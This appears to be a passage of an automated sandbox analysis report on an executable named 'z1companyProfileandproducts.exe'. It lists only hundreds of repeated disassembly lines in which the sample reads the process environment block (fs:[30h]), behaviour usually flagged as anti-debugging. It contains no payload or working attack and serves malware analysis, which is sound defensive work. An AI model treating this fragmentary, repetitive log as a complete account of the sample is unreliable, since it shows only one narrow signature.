              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970535 mov eax, dword ptr fs:[00000030h]0_2_01970535
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970535 mov eax, dword ptr fs:[00000030h]0_2_01970535
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970535 mov eax, dword ptr fs:[00000030h]0_2_01970535
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970535 mov eax, dword ptr fs:[00000030h]0_2_01970535
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970535 mov eax, dword ptr fs:[00000030h]0_2_01970535
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A34500 mov eax, dword ptr fs:[00000030h]0_2_01A34500
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A34500 mov eax, dword ptr fs:[00000030h]0_2_01A34500
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A34500 mov eax, dword ptr fs:[00000030h]0_2_01A34500
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A34500 mov eax, dword ptr fs:[00000030h]0_2_01A34500
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A34500 mov eax, dword ptr fs:[00000030h]0_2_01A34500
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A34500 mov eax, dword ptr fs:[00000030h]0_2_01A34500
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A34500 mov eax, dword ptr fs:[00000030h]0_2_01A34500
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198E53E mov eax, dword ptr fs:[00000030h]0_2_0198E53E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198E53E mov eax, dword ptr fs:[00000030h]0_2_0198E53E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198E53E mov eax, dword ptr fs:[00000030h]0_2_0198E53E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198E53E mov eax, dword ptr fs:[00000030h]0_2_0198E53E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198E53E mov eax, dword ptr fs:[00000030h]0_2_0198E53E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01968550 mov eax, dword ptr fs:[00000030h]0_2_01968550
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01968550 mov eax, dword ptr fs:[00000030h]0_2_01968550
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199656A mov eax, dword ptr fs:[00000030h]0_2_0199656A
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199656A mov eax, dword ptr fs:[00000030h]0_2_0199656A
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199656A mov eax, dword ptr fs:[00000030h]0_2_0199656A
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019944B0 mov ecx, dword ptr fs:[00000030h]0_2_019944B0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019EA4B0 mov eax, dword ptr fs:[00000030h]0_2_019EA4B0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A1A49A mov eax, dword ptr fs:[00000030h]0_2_01A1A49A
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019664AB mov eax, dword ptr fs:[00000030h]0_2_019664AB
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019604E5 mov ecx, dword ptr fs:[00000030h]0_2_019604E5
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01998402 mov eax, dword ptr fs:[00000030h]0_2_01998402
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01998402 mov eax, dword ptr fs:[00000030h]0_2_01998402
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01998402 mov eax, dword ptr fs:[00000030h]0_2_01998402
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199A430 mov eax, dword ptr fs:[00000030h]0_2_0199A430
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195C427 mov eax, dword ptr fs:[00000030h]0_2_0195C427
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195E420 mov eax, dword ptr fs:[00000030h]0_2_0195E420
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195E420 mov eax, dword ptr fs:[00000030h]0_2_0195E420
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195E420 mov eax, dword ptr fs:[00000030h]0_2_0195E420
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E6420 mov eax, dword ptr fs:[00000030h]0_2_019E6420
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E6420 mov eax, dword ptr fs:[00000030h]0_2_019E6420
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E6420 mov eax, dword ptr fs:[00000030h]0_2_019E6420
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E6420 mov eax, dword ptr fs:[00000030h]0_2_019E6420
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E6420 mov eax, dword ptr fs:[00000030h]0_2_019E6420
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E6420 mov eax, dword ptr fs:[00000030h]0_2_019E6420
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E6420 mov eax, dword ptr fs:[00000030h]0_2_019E6420
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198245A mov eax, dword ptr fs:[00000030h]0_2_0198245A
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195645D mov eax, dword ptr fs:[00000030h]0_2_0195645D
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199E443 mov eax, dword ptr fs:[00000030h]0_2_0199E443
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199E443 mov eax, dword ptr fs:[00000030h]0_2_0199E443
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199E443 mov eax, dword ptr fs:[00000030h]0_2_0199E443
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199E443 mov eax, dword ptr fs:[00000030h]0_2_0199E443
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199E443 mov eax, dword ptr fs:[00000030h]0_2_0199E443
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199E443 mov eax, dword ptr fs:[00000030h]0_2_0199E443
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199E443 mov eax, dword ptr fs:[00000030h]0_2_0199E443
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199E443 mov eax, dword ptr fs:[00000030h]0_2_0199E443
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198A470 mov eax, dword ptr fs:[00000030h]0_2_0198A470
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198A470 mov eax, dword ptr fs:[00000030h]0_2_0198A470
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198A470 mov eax, dword ptr fs:[00000030h]0_2_0198A470
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A1A456 mov eax, dword ptr fs:[00000030h]0_2_01A1A456
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019EC460 mov ecx, dword ptr fs:[00000030h]0_2_019EC460
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A147A0 mov eax, dword ptr fs:[00000030h]0_2_01A147A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0678E mov eax, dword ptr fs:[00000030h]0_2_01A0678E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019607AF mov eax, dword ptr fs:[00000030h]0_2_019607AF
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196C7C0 mov eax, dword ptr fs:[00000030h]0_2_0196C7C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E07C3 mov eax, dword ptr fs:[00000030h]0_2_019E07C3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019647FB mov eax, dword ptr fs:[00000030h]0_2_019647FB
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019647FB mov eax, dword ptr fs:[00000030h]0_2_019647FB
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019827ED mov eax, dword ptr fs:[00000030h]0_2_019827ED
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019827ED mov eax, dword ptr fs:[00000030h]0_2_019827ED
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019827ED mov eax, dword ptr fs:[00000030h]0_2_019827ED
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019EE7E1 mov eax, dword ptr fs:[00000030h]0_2_019EE7E1
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01960710 mov eax, dword ptr fs:[00000030h]0_2_01960710
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01990710 mov eax, dword ptr fs:[00000030h]0_2_01990710
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199C700 mov eax, dword ptr fs:[00000030h]0_2_0199C700
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199273C mov eax, dword ptr fs:[00000030h]0_2_0199273C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199273C mov ecx, dword ptr fs:[00000030h]0_2_0199273C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199273C mov eax, dword ptr fs:[00000030h]0_2_0199273C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DC730 mov eax, dword ptr fs:[00000030h]0_2_019DC730
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199C720 mov eax, dword ptr fs:[00000030h]0_2_0199C720
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199C720 mov eax, dword ptr fs:[00000030h]0_2_0199C720
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019EE75D mov eax, dword ptr fs:[00000030h]0_2_019EE75D
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01960750 mov eax, dword ptr fs:[00000030h]0_2_01960750
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2750 mov eax, dword ptr fs:[00000030h]0_2_019A2750
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2750 mov eax, dword ptr fs:[00000030h]0_2_019A2750
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E4755 mov eax, dword ptr fs:[00000030h]0_2_019E4755
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199674D mov esi, dword ptr fs:[00000030h]0_2_0199674D
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199674D mov eax, dword ptr fs:[00000030h]0_2_0199674D
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199674D mov eax, dword ptr fs:[00000030h]0_2_0199674D
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01968770 mov eax, dword ptr fs:[00000030h]0_2_01968770
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970770 mov eax, dword ptr fs:[00000030h]0_2_01970770
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970770 mov eax, dword ptr fs:[00000030h]0_2_01970770
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970770 mov eax, dword ptr fs:[00000030h]0_2_01970770
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970770 mov eax, dword ptr fs:[00000030h]0_2_01970770
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970770 mov eax, dword ptr fs:[00000030h]0_2_01970770
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970770 mov eax, dword ptr fs:[00000030h]0_2_01970770
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970770 mov eax, dword ptr fs:[00000030h]0_2_01970770
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970770 mov eax, dword ptr fs:[00000030h]0_2_01970770
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970770 mov eax, dword ptr fs:[00000030h]0_2_01970770
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970770 mov eax, dword ptr fs:[00000030h]0_2_01970770
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970770 mov eax, dword ptr fs:[00000030h]0_2_01970770
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970770 mov eax, dword ptr fs:[00000030h]0_2_01970770
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01964690 mov eax, dword ptr fs:[00000030h]0_2_01964690
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01964690 mov eax, dword ptr fs:[00000030h]0_2_01964690
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019966B0 mov eax, dword ptr fs:[00000030h]0_2_019966B0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199C6A6 mov eax, dword ptr fs:[00000030h]0_2_0199C6A6
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199A6C7 mov ebx, dword ptr fs:[00000030h]0_2_0199A6C7
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199A6C7 mov eax, dword ptr fs:[00000030h]0_2_0199A6C7
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E06F1 mov eax, dword ptr fs:[00000030h]0_2_019E06F1
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E06F1 mov eax, dword ptr fs:[00000030h]0_2_019E06F1
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DE6F2 mov eax, dword ptr fs:[00000030h]0_2_019DE6F2
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DE6F2 mov eax, dword ptr fs:[00000030h]0_2_019DE6F2
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DE6F2 mov eax, dword ptr fs:[00000030h]0_2_019DE6F2
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DE6F2 mov eax, dword ptr fs:[00000030h]0_2_019DE6F2
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2619 mov eax, dword ptr fs:[00000030h]0_2_019A2619
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DE609 mov eax, dword ptr fs:[00000030h]0_2_019DE609
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197260B mov eax, dword ptr fs:[00000030h]0_2_0197260B
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197260B mov eax, dword ptr fs:[00000030h]0_2_0197260B
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197260B mov eax, dword ptr fs:[00000030h]0_2_0197260B
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197260B mov eax, dword ptr fs:[00000030h]0_2_0197260B
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197260B mov eax, dword ptr fs:[00000030h]0_2_0197260B
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197260B mov eax, dword ptr fs:[00000030h]0_2_0197260B
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197260B mov eax, dword ptr fs:[00000030h]0_2_0197260B
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197E627 mov eax, dword ptr fs:[00000030h]0_2_0197E627
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01996620 mov eax, dword ptr fs:[00000030h]0_2_01996620
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01998620 mov eax, dword ptr fs:[00000030h]0_2_01998620
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196262C mov eax, dword ptr fs:[00000030h]0_2_0196262C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2866E mov eax, dword ptr fs:[00000030h]0_2_01A2866E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2866E mov eax, dword ptr fs:[00000030h]0_2_01A2866E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197C640 mov eax, dword ptr fs:[00000030h]0_2_0197C640
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01992674 mov eax, dword ptr fs:[00000030h]0_2_01992674
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199A660 mov eax, dword ptr fs:[00000030h]0_2_0199A660
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199A660 mov eax, dword ptr fs:[00000030h]0_2_0199A660
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E89B3 mov esi, dword ptr fs:[00000030h]0_2_019E89B3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E89B3 mov eax, dword ptr fs:[00000030h]0_2_019E89B3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E89B3 mov eax, dword ptr fs:[00000030h]0_2_019E89B3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019729A0 mov eax, dword ptr fs:[00000030h]0_2_019729A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019729A0 mov eax, dword ptr fs:[00000030h]0_2_019729A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019729A0 mov eax, dword ptr fs:[00000030h]0_2_019729A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019729A0 mov eax, dword ptr fs:[00000030h]0_2_019729A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019729A0 mov eax, dword ptr fs:[00000030h]0_2_019729A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019729A0 mov eax, dword ptr fs:[00000030h]0_2_019729A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019729A0 mov eax, dword ptr fs:[00000030h]0_2_019729A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019729A0 mov eax, dword ptr fs:[00000030h]0_2_019729A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019729A0 mov eax, dword ptr fs:[00000030h]0_2_019729A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019729A0 mov eax, dword ptr fs:[00000030h]0_2_019729A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019729A0 mov eax, dword ptr fs:[00000030h]0_2_019729A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019729A0 mov eax, dword ptr fs:[00000030h]0_2_019729A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019729A0 mov eax, dword ptr fs:[00000030h]0_2_019729A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019609AD mov eax, dword ptr fs:[00000030h]0_2_019609AD
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019609AD mov eax, dword ptr fs:[00000030h]0_2_019609AD
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196A9D0 mov eax, dword ptr fs:[00000030h]0_2_0196A9D0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196A9D0 mov eax, dword ptr fs:[00000030h]0_2_0196A9D0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196A9D0 mov eax, dword ptr fs:[00000030h]0_2_0196A9D0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196A9D0 mov eax, dword ptr fs:[00000030h]0_2_0196A9D0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196A9D0 mov eax, dword ptr fs:[00000030h]0_2_0196A9D0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196A9D0 mov eax, dword ptr fs:[00000030h]0_2_0196A9D0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019949D0 mov eax, dword ptr fs:[00000030h]0_2_019949D0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F69C0 mov eax, dword ptr fs:[00000030h]0_2_019F69C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019929F9 mov eax, dword ptr fs:[00000030h]0_2_019929F9
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019929F9 mov eax, dword ptr fs:[00000030h]0_2_019929F9
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2A9D3 mov eax, dword ptr fs:[00000030h]0_2_01A2A9D3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019EE9E0 mov eax, dword ptr fs:[00000030h]0_2_019EE9E0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019EC912 mov eax, dword ptr fs:[00000030h]0_2_019EC912
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01958918 mov eax, dword ptr fs:[00000030h]0_2_01958918
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01958918 mov eax, dword ptr fs:[00000030h]0_2_01958918
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DE908 mov eax, dword ptr fs:[00000030h]0_2_019DE908
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DE908 mov eax, dword ptr fs:[00000030h]0_2_019DE908
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E892A mov eax, dword ptr fs:[00000030h]0_2_019E892A
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F892B mov eax, dword ptr fs:[00000030h]0_2_019F892B
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E0946 mov eax, dword ptr fs:[00000030h]0_2_019E0946
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A04978 mov eax, dword ptr fs:[00000030h]0_2_01A04978
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A04978 mov eax, dword ptr fs:[00000030h]0_2_01A04978
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019EC97C mov eax, dword ptr fs:[00000030h]0_2_019EC97C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A096E mov eax, dword ptr fs:[00000030h]0_2_019A096E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A096E mov edx, dword ptr fs:[00000030h]0_2_019A096E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A096E mov eax, dword ptr fs:[00000030h]0_2_019A096E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01986962 mov eax, dword ptr fs:[00000030h]0_2_01986962
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01986962 mov eax, dword ptr fs:[00000030h]0_2_01986962
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01986962 mov eax, dword ptr fs:[00000030h]0_2_01986962
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019EC89D mov eax, dword ptr fs:[00000030h]0_2_019EC89D
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01960887 mov eax, dword ptr fs:[00000030h]0_2_01960887
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2A8E4 mov eax, dword ptr fs:[00000030h]0_2_01A2A8E4
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198E8C0 mov eax, dword ptr fs:[00000030h]0_2_0198E8C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199C8F9 mov eax, dword ptr fs:[00000030h]0_2_0199C8F9
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199C8F9 mov eax, dword ptr fs:[00000030h]0_2_0199C8F9
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019EC810 mov eax, dword ptr fs:[00000030h]0_2_019EC810
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0483A mov eax, dword ptr fs:[00000030h]0_2_01A0483A
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0483A mov eax, dword ptr fs:[00000030h]0_2_01A0483A
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199A830 mov eax, dword ptr fs:[00000030h]0_2_0199A830
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01982835 mov eax, dword ptr fs:[00000030h]0_2_01982835
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01982835 mov eax, dword ptr fs:[00000030h]0_2_01982835
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01982835 mov eax, dword ptr fs:[00000030h]0_2_01982835
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01982835 mov ecx, dword ptr fs:[00000030h]0_2_01982835
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01982835 mov eax, dword ptr fs:[00000030h]0_2_01982835
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01982835 mov eax, dword ptr fs:[00000030h]0_2_01982835
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01990854 mov eax, dword ptr fs:[00000030h]0_2_01990854
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01964859 mov eax, dword ptr fs:[00000030h]0_2_01964859
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01964859 mov eax, dword ptr fs:[00000030h]0_2_01964859
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01972840 mov ecx, dword ptr fs:[00000030h]0_2_01972840
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019EE872 mov eax, dword ptr fs:[00000030h]0_2_019EE872
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019EE872 mov eax, dword ptr fs:[00000030h]0_2_019EE872
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F6870 mov eax, dword ptr fs:[00000030h]0_2_019F6870
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F6870 mov eax, dword ptr fs:[00000030h]0_2_019F6870
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A14BB0 mov eax, dword ptr fs:[00000030h]0_2_01A14BB0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A14BB0 mov eax, dword ptr fs:[00000030h]0_2_01A14BB0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970BBE mov eax, dword ptr fs:[00000030h]0_2_01970BBE
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970BBE mov eax, dword ptr fs:[00000030h]0_2_01970BBE
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01980BCB mov eax, dword ptr fs:[00000030h]0_2_01980BCB
